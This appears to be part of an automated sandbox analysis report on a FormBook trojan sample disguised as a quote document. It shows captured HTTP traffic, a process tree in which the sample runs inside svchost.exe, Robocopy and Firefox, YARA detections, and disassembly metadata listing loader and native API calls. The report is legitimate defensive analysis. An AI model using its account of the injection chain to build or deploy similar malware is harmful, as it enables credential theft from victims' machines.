                                                                                                                                                                            Data Raw: 62 34 37 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d
                                                                                                                                                                            Data Ascii: b472<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">
                                                                                                                                                                            Sep 27, 2024 17:32:19.335813999 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72
                                                                                                                                                                            Data Ascii: <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in wi
                                                                                                                                                                            Sep 27, 2024 17:32:19.335850954 CEST1236INData Raw: 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67 22 26 26
                                                                                                                                                                            Data Ascii: (j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages"
                                                                                                                                                                            Sep 27, 2024 17:32:19.335973024 CEST1236INData Raw: 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73
                                                                                                                                                                            Data Ascii: es" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.sub
                                                                                                                                                                            Sep 27, 2024 17:32:19.336007118 CEST1236INData Raw: 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b 28 6e 65
                                                                                                                                                                            Data Ascii: mp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if
                                                                                                                                                                            Sep 27, 2024 17:32:19.336041927 CEST1236INData Raw: 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69 73 70 6c 61 79 3a
                                                                                                                                                                            Data Ascii: if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute
                                                                                                                                                                            Sep 27, 2024 17:32:19.336076975 CEST1236INData Raw: 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 7c 7c 61 5b 30 5d 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28
                                                                                                                                                                            Data Ascii: a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion
                                                                                                                                                                            Sep 27, 2024 17:32:19.336780071 CEST1236INData Raw: 22 7c 7c 67 3d 3d 3d 22 67 65 74 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 46 69 65 6c 64 22 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28
                                                                                                                                                                            Data Ascii: "||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!=
                                                                                                                                                                            Sep 27, 2024 17:32:19.336813927 CEST1236INData Raw: 5f 73 65 74 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 28 77 69
                                                                                                                                                                            Data Ascii: _setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventLi
                                                                                                                                                                            Sep 27, 2024 17:32:19.336849928 CEST1236INData Raw: 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f
                                                                                                                                                                            Data Ascii: ype="text/javascript">var abp;</script><script type="text/javascript" src="http://www.alphaaistore.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.alphaaistore.com/px.js?ch=2"></script><script type="text/javascript">fun
                                                                                                                                                                            Sep 27, 2024 17:32:19.345432997 CEST41INData Raw: 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2f 6d 6f 6e 74
                                                                                                                                                                            Data Ascii: m/__media__/fonts/montserrat-regular/mont


                                                                                                                                                                            Statistics

                                                                                                                                                                            CPU Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Memory Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Behavior

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            System Behavior

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:11:29:16
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\Quote #270924.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Quote #270924.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:1'366'661 bytes
                                                                                                                                                                            MD5 hash:1018070FFEB3F5FA59A306FA6E6B0F57
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:2
                                                                                                                                                                            Start time:11:29:21
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Quote #270924.exe"
                                                                                                                                                                            Imagebase:0xd10000
                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:11:29:23
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe"
                                                                                                                                                                            Imagebase:0x570000
                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:11:29:25
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\Robocopy.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\Robocopy.exe"
                                                                                                                                                                            Imagebase:0x9a0000
                                                                                                                                                                            File size:131'072 bytes
                                                                                                                                                                            MD5 hash:0A1AA3D138103ED9FB645F6B02E41A2F
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:6
                                                                                                                                                                            Start time:11:29:38
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe"
                                                                                                                                                                            Imagebase:0x570000
                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:7
                                                                                                                                                                            Start time:11:29:50
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                            Imagebase:0x7ff79f9e0000
                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Disassembly

                                                                                                                                                                            Reset < >

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:1.4%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:5%
                                                                                                                                                                              Signature Coverage:14.3%
                                                                                                                                                                              Total number of Nodes:119
                                                                                                                                                                              Total number of Limit Nodes:7
                                                                                                                                                                              execution_graph 81150 430123 81153 42ef03 81150->81153 81156 42d193 81153->81156 81155 42ef1c 81157 42d1b0 81156->81157 81158 42d1c1 RtlFreeHeap 81157->81158 81158->81155 81159 42efe3 81162 42d143 81159->81162 81161 42effe 81163 42d160 81162->81163 81164 42d171 RtlAllocateHeap 81163->81164 81164->81161 81165 4254a3 81170 4254bc 81165->81170 81166 425549 81167 425504 81168 42ef03 RtlFreeHeap 81167->81168 81169 425514 81168->81169 81170->81166 81170->81167 81171 425544 81170->81171 81172 42ef03 RtlFreeHeap 81171->81172 81172->81166 81191 401b51 81192 401b60 81191->81192 81195 430593 81192->81195 81198 42eab3 81195->81198 81199 42ead9 81198->81199 81210 407843 81199->81210 81201 42eaef 81209 401c87 81201->81209 81213 41b813 81201->81213 81203 42eb0e 81204 42eb23 81203->81204 81228 42d1e3 81203->81228 81224 428a33 81204->81224 81207 42eb3d 81208 42d1e3 ExitProcess 81207->81208 81208->81209 81231 416b53 81210->81231 81212 407850 81212->81201 81214 41b83f 81213->81214 81249 41b703 81214->81249 81217 41b884 81219 41b8a0 81217->81219 81222 42ce13 NtClose 81217->81222 81218 41b86c 81220 41b877 81218->81220 81221 42ce13 NtClose 81218->81221 81219->81203 81220->81203 81221->81220 81223 41b896 81222->81223 81223->81203 81225 428a94 81224->81225 81227 428aa1 81225->81227 81260 418d03 81225->81260 81227->81207 81229 42d1fd 81228->81229 81230 42d20e ExitProcess 81229->81230 81230->81204 81232 416b6d 81231->81232 81234 416b86 81232->81234 81235 42d883 81232->81235 81234->81212 81237 42d89d 81235->81237 81236 42d8cc 81236->81234 81237->81236 81242 42c423 81237->81242 81240 42ef03 RtlFreeHeap 81241 42d945 81240->81241 81241->81234 81243 42c440 81242->81243 81246 3072c0a 81243->81246 81244 42c46c 81244->81240 81247 3072c11 81246->81247 81248 3072c1f LdrInitializeThunk 81246->81248 81247->81244 81248->81244 81250 41b71d 81249->81250 81254 41b7f9 81249->81254 81255 42c4c3 81250->81255 81253 42ce13 NtClose 81253->81254 81254->81217 81254->81218 81256 42c4dd 81255->81256 81259 30735c0 LdrInitializeThunk 81256->81259 81257 41b7ed 81257->81253 81259->81257 81262 418d2d 81260->81262 81261 41923b 81261->81227 81262->81261 81268 414333 81262->81268 81264 418e5a 81264->81261 81265 42ef03 RtlFreeHeap 81264->81265 81266 418e72 81265->81266 81266->81261 81267 42d1e3 ExitProcess 81266->81267 81267->81261 81272 414353 81268->81272 81270 4143bc 81270->81264 81271 4143b2 81271->81264 81272->81270 81273 41bb23 RtlFreeHeap LdrInitializeThunk 81272->81273 81273->81271 81274 425113 81275 42512f 81274->81275 81276 425157 81275->81276 81277 42516b 81275->81277 81278 42ce13 NtClose 81276->81278 81279 42ce13 NtClose 81277->81279 81280 425160 81278->81280 81281 425174 81279->81281 81284 42f023 RtlAllocateHeap 81281->81284 81283 42517f 81284->81283 81285 42c3d3 81286 42c3ed 81285->81286 81289 3072df0 LdrInitializeThunk 81286->81289 81287 42c415 81289->81287 81173 41ba03 81174 41ba47 81173->81174 81175 41ba68 81174->81175 81177 42ce13 81174->81177 81178 42ce2d 81177->81178 81179 42ce3e NtClose 81178->81179 81179->81175 81180 4146c3 81181 4146d3 81180->81181 81186 417e93 81181->81186 81183 4146fb 81184 414740 81183->81184 81185 41472f PostThreadMessageW 81183->81185 81185->81184 81187 417eb7 81186->81187 81188 417ef3 LdrLoadDll 81187->81188 81189 417ebe 81187->81189 81188->81189 81189->81183 81290 414755 81291 4147b3 81290->81291 81292 414701 81290->81292 81293 41472f PostThreadMessageW 81292->81293 81294 414740 81292->81294 81293->81294 81190 3072b60 LdrInitializeThunk 81295 419458 81296 419462 81295->81296 81297 42ce13 NtClose 81295->81297 81297->81296

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              Function 00417E93 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 97 417e93-417ebc call 42fc03 100 417ec2-417ed0 call 430203 97->100 101 417ebe-417ec1 97->101 104 417ee0-417ef1 call 42e583 100->104 105 417ed2-417edd call 4304a3 100->105 110 417ef3-417f07 LdrLoadDll 104->110 111 417f0a-417f0d 104->111 105->104 110->111
                                                                                                                                                                              APIs
                                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417F05
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                                              • Opcode ID: 090d4582f4cec9fa612a4f3a88d0b2eedc2089dfeff03fc0dfc7bf97e9e0bd52
                                                                                                                                                                              • Instruction ID: f3c9c9cd2de25c48b25da892f34988a046c9b3f6ef809f4064f1309a4d22e372
                                                                                                                                                                              • Opcode Fuzzy Hash: 090d4582f4cec9fa612a4f3a88d0b2eedc2089dfeff03fc0dfc7bf97e9e0bd52
                                                                                                                                                                              • Instruction Fuzzy Hash: 270152B5E0020DA7DF10DAE1DC52FDEB7B8AB14308F0041AAED0897240F634EB498755
                                                                                                                                                                              Function 0042CE13 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 118 42ce13-42ce4c call 404b43 call 42e073 NtClose
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CE47
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                                              • Opcode ID: 1963737b460c6f63be527a23d1b75cdbbab3325c8c3d0d6fe0d3c6db62f6a83e
                                                                                                                                                                              • Instruction ID: 70958d688ee4830419c2275c035ac38a32e46af9d23104fbb137359aecbbf3fe
                                                                                                                                                                              • Opcode Fuzzy Hash: 1963737b460c6f63be527a23d1b75cdbbab3325c8c3d0d6fe0d3c6db62f6a83e
                                                                                                                                                                              • Instruction Fuzzy Hash: 52E08C36300614BBD620FA5ADC11FABB7ACEFC5715F40405AFB08A7282C6B5BA1187F5
                                                                                                                                                                              Function 030735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 134 30735c0-30735cc LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 467e976f46e37073f495828fbb8c46a225d948725581b2d38fed6297dcbcc567
                                                                                                                                                                              • Instruction ID: 4fb367fa3e6d522a34980a98d149cddb88a1beb4535a50ecc5817c63b3a8f904
                                                                                                                                                                              • Opcode Fuzzy Hash: 467e976f46e37073f495828fbb8c46a225d948725581b2d38fed6297dcbcc567
                                                                                                                                                                              • Instruction Fuzzy Hash: BF90023160650802E100B2588554746104687D0301FA5C411A082456CD87958A5165A2
                                                                                                                                                                              Function 03072B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 132 3072b60-3072b6c LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: c2864eb0aa40ae442fafd955dad36e1b12e8194d0df41917ff58320859b5bae4
                                                                                                                                                                              • Instruction ID: a2e36d66a1929a559374efda2c289cd63c9344a5a9e14ef8da73e41d35bde325
                                                                                                                                                                              • Opcode Fuzzy Hash: c2864eb0aa40ae442fafd955dad36e1b12e8194d0df41917ff58320859b5bae4
                                                                                                                                                                              • Instruction Fuzzy Hash: CC900261203404035105B2588454656404B87E0301B95C021E1414594DC62589916125
                                                                                                                                                                              Function 03072DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 133 3072df0-3072dfc LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 46e9ba65936f9c5d9cd069e5dceb3c0b7e65d0dc8f9c9eb1b28fd4e7869207c5
                                                                                                                                                                              • Instruction ID: 8a2d8998b189b61c1a792f2cc443a34c8f4efd984ae315557f11c2b3409fa906
                                                                                                                                                                              • Opcode Fuzzy Hash: 46e9ba65936f9c5d9cd069e5dceb3c0b7e65d0dc8f9c9eb1b28fd4e7869207c5
                                                                                                                                                                              • Instruction Fuzzy Hash: 5990023120240813E111B2588544747004A87D0341FD5C412A082455CD97568A52A121
                                                                                                                                                                              Function 00418D03 Relevance: .4, Instructions: 437COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 25db1c85c054b69945d5d882fed943971243958d82deec4f0b68e3bdc322ec6e
                                                                                                                                                                              • Instruction ID: 3a732ad5c39c8629aa392827a2f30c9ac81812c6231d6a2a37b06dd117813c0c
                                                                                                                                                                              • Opcode Fuzzy Hash: 25db1c85c054b69945d5d882fed943971243958d82deec4f0b68e3bdc322ec6e
                                                                                                                                                                              • Instruction Fuzzy Hash: D7F1C471D0021AAFDB24DF94CC85AEEB7B5AF45304F14819EE408A7341DB746E85CF99
                                                                                                                                                                              Function 00414755 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75threadwindowCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
